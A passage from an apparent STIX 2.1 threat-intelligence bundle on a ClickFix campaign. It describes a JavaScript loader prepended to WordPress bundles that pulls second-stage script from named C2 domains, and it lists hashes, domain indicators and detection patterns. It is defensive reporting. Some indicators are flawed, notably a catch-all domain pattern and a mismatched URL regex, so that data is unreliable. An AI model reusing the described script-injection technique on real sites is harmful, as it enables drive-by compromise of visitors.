      "id": "relationship--9bf8db0a-4905-41a2-bff8-707dd02745a6",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--e7c64603-910c-46ca-aa07-e85cb6ba2432"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9a33a4b4-3ee0-4998-92da-876643569906",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--5dc2a226-e68f-4783-b8cd-38247d4fef7d"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--53188bee-af86-4335-a42e-d61d149e1d17",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--008a4ad5-b0f1-4180-a7e3-9d3a58c0c143"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f46cc453-0525-47ad-86f8-eff7d9a9837c",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--6a49e18b-18d1-4720-ba93-eced5079b060"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--245b9046-96a0-434c-a2ea-36824a18d3a6",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--b779f195-2015-4fc3-8419-68353cb9518c"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b2484a1f-cc8f-4e48-bb32-7bb221e84132",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--0d4a453d-722c-43a7-bed1-3521d275cc28"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0a7163c0-c74e-4235-8b57-19fbd4caea92",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--bd64e0b1-836d-4d1d-a305-c98f470840ea"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c4628b05-8725-4007-b503-c78cce6a6d5f",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--8614fc05-7c49-47c3-9248-4c1d60c5e1be"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--816115cb-72c5-4117-9db0-271238274995",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--79fb3213-1f11-43e1-956c-b8d8e253d0ec"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3a768c5d-61d5-4174-a61e-09b99227ec92",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--224b0c8d-55dc-4fc3-b518-1dde14ee8a1e"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0fb79a5f-8253-4a2b-a783-bc7ed23ef80c",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--0d0461cf-e98a-4e7b-8aac-5aba97b7b803"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--92eac3c0-2eee-4ad1-a21b-10e32e608433",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--b6716550-aae5-42da-b926-70b90e26b397"
    },
    {
      "type": "threat-actor",
      "spec_version": "2.1",
      "id": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "TDS Cluster \u2014 AS202412 / ntdnewtds infrastructure",
      "description": "Threat cluster operating shared TDS infrastructure across ntdnewtds.shop, dnsnewtds.shop, and sdntds.shop. Delivers ClickFix fake-CAPTCHA payloads via WordPress bundle hijacking. Consistent TTPs with SL-ADV-007 variant 1: same deduplication guard (window.__performance_optimizer_v6), same synchronous XHR injection pattern, same setInterval anti-debug timing (4000ms), same Function.constructor sandbox escape probe. This variant (V2) introduces a third TDS domain, a new endpoint path (/teamrepo vs /jsrepo), and a bundle-prepend delivery method that camouflages the loader inside a legitimate WordPress combined-JS asset. Consumer note: this object appears to describe the same actor as threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c (named 'OmegaTech' in the bundle's relationship descriptions), which is the object all 'uses' / 'controls' / 'attributed-to' relationships reference; treat the two as one cluster until they are merged, otherwise attribution queries on this ID will return no linked TTPs or infrastructure.",
      "threat_actor_types": [
        "criminal",
        "financially-motivated"
      ],
      "sophistication": "advanced",
      "resource_level": "individual",
      "primary_motivation": "financial-gain",
      "aliases": [
        "AS202412 TDS Actor",
        "SL-ADV-007 cluster"
      ],
      "labels": [
        "clickfix",
        "tds",
        "wordpress-bundle-hijack",
        "infostealer"
      ]
    },
    {
      "type": "campaign",
      "spec_version": "2.1",
      "id": "campaign--6602b80a-c500-4017-9815-36848af024e0",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "SL-ADV-007-V2: TDS Cluster \u2014 WordPress Bundle Hijack Variant",
      "description": "Second variant of the SL-ADV-007 ClickFix TDS campaign. Loader prepended to a legitimate WordPress combined-JS bundle as camouflage. Infrastructure expanded: third TDS domain sdntds.shop added, endpoint path changed from /jsrepo to /teamrepo. The loader's injection mechanism is left in cleartext (no obfuscation), while the anti-debug section retains RC4+Base64 obfuscation. Attributed to the same cluster as V1 via shared guard, XHR pattern, timing, and domains. Data-quality note: first_seen is set to 2026-01-01, which predates the earliest observation window documented for this cluster (March 2026) and looks like a placeholder; confirm against telemetry before using it for timeline analysis.",
      "first_seen": "2026-01-01T00:00:00Z",
      "last_seen": "2026-05-19T00:00:00.000Z",
      "labels": [
        "clickfix",
        "bundle-hijack",
        "tds",
        "wordpress",
        "v2"
      ]
    },
    {
      "type": "malware",
      "spec_version": "2.1",
      "id": "malware--4f6c20d5-4b2f-449a-8c40-72a4cfad8d59",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "TDS Stage-1 JS Loader \u2014 Variant 2 (bundle-prepend, /teamrepo)",
      "description": "Second observed variant of the Stage-1 TDS JS loader from the SL-ADV-007 cluster. Key distinction from Variant 1: the injection mechanism (lines 1-25) is CLEARTEXT \u2014 no obfuscation applied to the loader itself. The malware is prepended to a legitimate WordPress combined-JS bundle (1,131,399 bytes total) containing jQuery Migrate 3.4.1, Avada theme JS, Contact Form 7, imagesLoaded, Waypoints, Swiper, FlexSlider, WooCommerce theme JS, Isotope, InfiniteScroll, and WPBakery Page Builder v6.0.0. This bundle-hijack delivery makes the file appear as a legitimate cached asset to casual inspection and WAF/proxy analysis. The loader checks window.__performance_optimizer_v6 as a deduplication guard, then iterates three base64-encoded TDS endpoints (/teamrepo?rnd=<random>) via synchronous XMLHttpRequest. On HTTP 200: document.createElement('script'), script.text = responseText, document.head.appendChild(script). A separate obfuscated anti-debug section (lines 1071-2185, 758-entry RC4+Base64 string array, rotation 298290, decoder _0xc930) runs setInterval(_0x42fc94, 4000) debugger trap and Function.constructor('return this') sandbox escape probe \u2014 identical structural pattern to Variant 1.",
      "malware_types": [
        "trojan",
        "dropper"
      ],
      "is_family": false,
      "labels": [
        "tds",
        "clickfix",
        "stage1",
        "bundle-hijack",
        "cleartext-loader",
        "wordpress"
      ],
      "architecture_execution_envs": [
        "browser"
      ],
      "implementation_languages": [
        "javascript"
      ],
      "capabilities": [
        "anti-debugging",
        "anti-vm",
        "remote-code-execution",
        "obfuscated-payloads"
      ]
    },
    {
      "type": "note",
      "spec_version": "2.1",
      "id": "note--b05cc05f-8819-4220-9a0d-be63d5a66841",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "abstract": "Variant linkage: SL-ADV-007-V2 attributed to same cluster as SL-ADV-007-V1",
      "content": "Shared indicators confirming common authorship between V1 (god-help-me.js/stuff.js) and V2 (stuff1.js):\n\u2022 window.__performance_optimizer_v6 deduplication guard (identical)\n\u2022 Synchronous XHR GET + createElement('script') + script.text + head.appendChild() (identical)\n\u2022 Math.random() cache-buster appended to URL (identical)\n\u2022 setInterval(debugger_trap, 4000) timing (identical)\n\u2022 Function.constructor('return this') sandbox escape probe (identical)\n\u2022 RC4+Base64 obfuscator.io cipher for anti-debug section (same cipher, smaller array)\n\u2022 _0x490f string array function name (identical)\n\u2022 Shared TDS domains ntdnewtds.shop and dnsnewtds.shop\n\nV2-specific deltas (infrastructure evolution):\n\u2022 Third TDS domain added: sdntds.shop\n\u2022 Endpoint path changed: /jsrepo \u2192 /teamrepo\n\u2022 Main loader changed from fully obfuscated to CLEARTEXT\n\u2022 Delivery method changed: standalone injection \u2192 WordPress bundle prepend\n\u2022 Host bundle: 29,062 lines of legitimate WP plugins used as cover",
      "object_refs": [
        "malware--4f6c20d5-4b2f-449a-8c40-72a4cfad8d59",
        "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--8b3501a9-572e-4272-8fe8-a95130c3fc6c",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "ntdnewtds.shop \u2014 Primary TDS C2 (V1+V2)",
      "description": "Shared primary TDS C2 across both variants. V1: /jsrepo path. V2: /teamrepo path.",
      "infrastructure_types": [
        "command-and-control"
      ],
      "labels": [
        "tds",
        "c2",
        "shared",
        "ntdnewtds"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--b5f8251a-4955-4e3c-8eaf-fc8d3ebbf3ac",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "dnsnewtds.shop \u2014 Fallback TDS C2 (V1+V2)",
      "description": "Shared fallback TDS endpoint across both variants.",
      "infrastructure_types": [
        "command-and-control"
      ],
      "labels": [
        "tds",
        "c2",
        "shared",
        "dnsnewtds"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--59f7ff27-cf5c-4895-8ebf-6edaf249698b",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "sdntds.shop \u2014 Third TDS C2 (V2 only)",
      "description": "New third TDS endpoint introduced in Variant 2. Not present in Variant 1. Queried at /teamrepo?rnd=<random> after ntdnewtds and dnsnewtds fail.",
      "infrastructure_types": [
        "command-and-control"
      ],
      "labels": [
        "tds",
        "c2",
        "new",
        "sdntds",
        "v2-only"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f04509f2-c681-4ab6-b087-2602d8d0f33a",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "File: stuff1.js \u2014 Variant 2 bundle-hijack (1,131,399 bytes)",
      "description": "WordPress combined-JS bundle with TDS loader prepended. Contains cleartext injection mechanism + obfuscated anti-debug section + 10 legitimate WordPress plugins as cover.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[file:hashes.MD5 = '09d8e272484c2bef81590887460981ff' OR file:hashes.'SHA-1' = 'e221c94adb02cc387bcbf9265c1769f36c59cce5' OR file:hashes.'SHA-256' = 'b04f539c7bbb9133d2f801bfce73ec84ad3cc33768685ca415113f622db90168']",
      "pattern_type": "stix",
      "valid_from": "2026-05-19T00:00:00.000Z",
      "labels": [
        "bundle-hijack",
        "stage1",
        "v2",
        "file-hash"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--227c1dc1-f220-4f04-bd9f-56c08678962e",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "Domain: ntdnewtds.shop (shared V1+V2)",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[domain-name:value = 'ntdnewtds.shop']",
      "pattern_type": "stix",
      "valid_from": "2026-05-19T00:00:00.000Z",
      "labels": [
        "tds",
        "c2",
        "shared"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--eb580302-abc8-46e9-bfe5-b2d4b7d43fe5",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "Domain: dnsnewtds.shop (shared V1+V2)",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[domain-name:value = 'dnsnewtds.shop']",
      "pattern_type": "stix",
      "valid_from": "2026-05-19T00:00:00.000Z",
      "labels": [
        "tds",
        "c2",
        "shared"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--555fac76-56df-477f-a55c-655e1848a22e",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "Domain: sdntds.shop (V2 only \u2014 NEW)",
      "description": "Third TDS domain not present in Variant 1. Infrastructure expansion indicator.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[domain-name:value = 'sdntds.shop']",
      "pattern_type": "stix",
      "valid_from": "2026-05-19T00:00:00.000Z",
      "labels": [
        "tds",
        "c2",
        "v2-only",
        "new-domain",
        "sdntds"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d37a9828-337b-483d-a7c8-6a45c715c4b8",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "URL Pattern: /teamrepo?rnd= endpoint (V2)",
      "description": "V2-specific TDS payload path. V1 used /jsrepo. Cache-busted with Math.random().",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[url:value MATCHES '^https?://(ntd|dns|sdn)newtds\\.shop/teamrepo\\?rnd=|sdntds\\.shop/teamrepo\\?rnd=']",
      "pattern_type": "stix",
      "valid_from": "2026-05-19T00:00:00.000Z",
      "labels": [
        "tds",
        "teamrepo",
        "v2",
        "url-pattern"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c65f9f8a-354e-47bf-8843-465baa2ee09f",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "DOM guard: window.__performance_optimizer_v6 (shared V1+V2)",
      "description": "Deduplication/re-execution guard shared across both variants. Confirms common authorship/framework.",
      "indicator_types": [
        "malicious-activity",
        "anomalous-activity"
      ],
      "pattern": "[domain-name:value MATCHES '.*']",
      "pattern_type": "stix",
      "valid_from": "2026-05-19T00:00:00.000Z",
      "labels": [
        "dom-guard",
        "shared-ioc",
        "attribution"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e5718f75-bc2b-4cb9-a5c6-3f0b98e54142",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "Code artifact: perfEndpoints / loadPerformanceScript / performanceXHR / optimizerScript",
      "description": "Cleartext variable names used in the V2 loader. Useful for YARA/string matching on bundles where loader is not obfuscated.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[file:content MATCHES 'loadPerformanceScript|perfEndpoints|performanceXHR|optimizerScript']",
      "pattern_type": "stix",
      "valid_from": "2026-05-19T00:00:00.000Z",
      "labels": [
        "yara-candidate",
        "string-ioc",
        "cleartext-loader"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9d0cdcaf-5c80-48fe-bb5e-761dc1acea81",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "File pattern: malicious loader prepended to WordPress combined-JS bundle",
      "description": "V2 delivery technique: window.__performance_optimizer_v6 guard appearing at byte offset 0 of a combined JS file also containing jQuery Migrate / WPBakery / Avada theme code. Flag any combined-JS asset whose first line is not a recognisable library comment.",
      "indicator_types": [
        "anomalous-activity"
      ],
      "pattern": "[file:content MATCHES '^if \\(!window\\.__performance_optimizer']",
      "pattern_type": "stix",
      "valid_from": "2026-05-19T00:00:00.000Z",
      "labels": [
        "detection-heuristic",
        "bundle-hijack",
        "first-byte-check"
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--30f20f37-3252-4ba7-a7ec-5801184cc078",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "T1059.007 \u2014 Command and Scripting Interpreter: JavaScript",
      "description": "Cleartext JS TDS loader prepended to WordPress bundle. Synchronous XHR + script injection identical to V1.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1059/007",
          "external_id": "T1059.007"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--24a98d95-0ecc-42a1-adae-3124fc5af164",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "T1027 \u2014 Obfuscated Files or Information",
      "description": "Anti-debug section uses RC4+Base64 obfuscator.io cipher (758-entry array, rotation 298290, decoder _0xc930). Main loader is deliberately left cleartext in V2 \u2014 partial obfuscation strategy.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1027",
          "external_id": "T1027"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--10ec9dcd-f7f1-4e00-aea2-f48b8236eaf4",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "T1027.010 \u2014 Command Obfuscation",
      "description": "All three TDS endpoint URLs are base64-encoded within the cleartext loader array.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1027/010",
          "external_id": "T1027.010"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e3492bdf-28a4-4651-861c-84b205b1c740",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "T1497.001 \u2014 Virtualization/Sandbox Evasion: System Checks",
      "description": "setInterval(_0x42fc94, 4000) debugger trap + Function.constructor('return this') sandbox escape. Identical timing and structure to Variant 1.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1497/001",
          "external_id": "T1497.001"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--008b5d30-4100-44e2-9557-79307c836574",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "T1195.002 \u2014 Supply Chain Compromise: Compromise Software Supply Chain / Asset Hijack",
      "description": "V2-specific: malicious loader prepended to legitimate WordPress combined-JS asset (jQuery Migrate + Avada + CF7 + WPBakery + 7 other plugins). Bundle hijacking camouflages the loader as part of the site's normal JS delivery.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1195/002",
          "external_id": "T1195.002"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--7f8e5085-ed68-42b9-9056-b395331f9096",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "T1189 \u2014 Drive-by Compromise",
      "description": "Compromised WordPress cannabis/dispensary site serves hijacked combined-JS to all visitors.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1189",
          "external_id": "T1189"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--83552909-7093-498f-bd03-51fa30e434db",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "T1566.002 \u2014 Phishing: Spearphishing Link",
      "description": "Visitors are lured to, or arrive organically at, the compromised site. The ClickFix CAPTCHA lure is delivered by the second stage.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1566/002",
          "external_id": "T1566.002"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--8e3f00c4-508d-403b-a1e6-ef8dbfa69ddf",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "T1203 \u2014 Exploitation for Client Execution",
      "description": "Fake Cloudflare CAPTCHA social-engineers the user into executing clipboard-placed PowerShell via Win+R.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1203",
          "external_id": "T1203"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--20faa53e-ad48-4eb3-86da-f3bffcdc490b",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "T1140 \u2014 Deobfuscate/Decode Files or Information",
      "description": "Anti-debug section strings decoded at runtime via RC4+Base64. TDS endpoint URLs decoded via atob() at runtime.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1140",
          "external_id": "T1140"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2115dee5-998e-44fd-a87f-af914112a548",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "T1104 \u2014 Multi-Stage Channels",
      "description": "Three-level TDS fallback chain: ntdnewtds.shop \u2192 dnsnewtds.shop \u2192 sdntds.shop (new in V2). Increased resilience vs V1 two-endpoint chain.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1104",
          "external_id": "T1104"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4221a565-d330-4a37-b682-bd8afea876b6",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "T1608.002 \u2014 Stage Capabilities: Upload Tool",
      "description": "TDS infrastructure serves the remotely hosted second-stage payload on demand via the /teamrepo endpoint.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1608/002",
          "external_id": "T1608.002"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--38c3f176-b3b8-4cf9-8d60-b159a4cddb1f",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "target_ref": "malware--4f6c20d5-4b2f-449a-8c40-72a4cfad8d59"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e2f8ee09-7395-4e81-b098-135915184564",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "controls",
      "source_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "target_ref": "infrastructure--8b3501a9-572e-4272-8fe8-a95130c3fc6c"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--17c9a593-2fee-42d9-9081-9d81f9e7035d",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "controls",
      "source_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "target_ref": "infrastructure--b5f8251a-4955-4e3c-8eaf-fc8d3ebbf3ac"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--36f566ee-2287-4b3e-abea-55b809be3577",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "controls",
      "source_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "target_ref": "infrastructure--59f7ff27-cf5c-4895-8ebf-6edaf249698b",
      "description": "Third TDS domain added in V2"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--61507db7-5a85-463b-9f03-2121b1e0a775",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "communicates-with",
      "source_ref": "malware--4f6c20d5-4b2f-449a-8c40-72a4cfad8d59",
      "target_ref": "infrastructure--8b3501a9-572e-4272-8fe8-a95130c3fc6c"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2255b461-22fd-4fa0-aacc-60bede0dbec6",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "communicates-with",
      "source_ref": "malware--4f6c20d5-4b2f-449a-8c40-72a4cfad8d59",
      "target_ref": "infrastructure--b5f8251a-4955-4e3c-8eaf-fc8d3ebbf3ac"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d50b4956-a533-4fd5-a69b-558d65c18605",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "communicates-with",
      "source_ref": "malware--4f6c20d5-4b2f-449a-8c40-72a4cfad8d59",
      "target_ref": "infrastructure--59f7ff27-cf5c-4895-8ebf-6edaf249698b"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fd1ffec0-771c-46ed-9ab6-7cecfd91b620",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--f04509f2-c681-4ab6-b087-2602d8d0f33a",
      "target_ref": "malware--4f6c20d5-4b2f-449a-8c40-72a4cfad8d59"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--14510bef-6ad1-4402-9760-ac802a403b96",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--227c1dc1-f220-4f04-bd9f-56c08678962e",
      "target_ref": "infrastructure--8b3501a9-572e-4272-8fe8-a95130c3fc6c"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b67b9518-1875-41f3-abed-86178e7bb945",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--eb580302-abc8-46e9-bfe5-b2d4b7d43fe5",
      "target_ref": "infrastructure--b5f8251a-4955-4e3c-8eaf-fc8d3ebbf3ac"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--978d37b1-1c32-4be8-89f0-a875185760f0",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--555fac76-56df-477f-a55c-655e1848a22e",
      "target_ref": "infrastructure--59f7ff27-cf5c-4895-8ebf-6edaf249698b"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a0f9dc47-dbfe-420e-b6dd-4fdbd755a207",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--d37a9828-337b-483d-a7c8-6a45c715c4b8",
      "target_ref": "malware--4f6c20d5-4b2f-449a-8c40-72a4cfad8d59"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ceee800e-9b48-4bb3-87f0-60eacc825df9",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--c65f9f8a-354e-47bf-8843-465baa2ee09f",
      "target_ref": "malware--4f6c20d5-4b2f-449a-8c40-72a4cfad8d59"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fd07bfab-cd90-495c-bed6-785aa1bb9662",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--e5718f75-bc2b-4cb9-a5c6-3f0b98e54142",
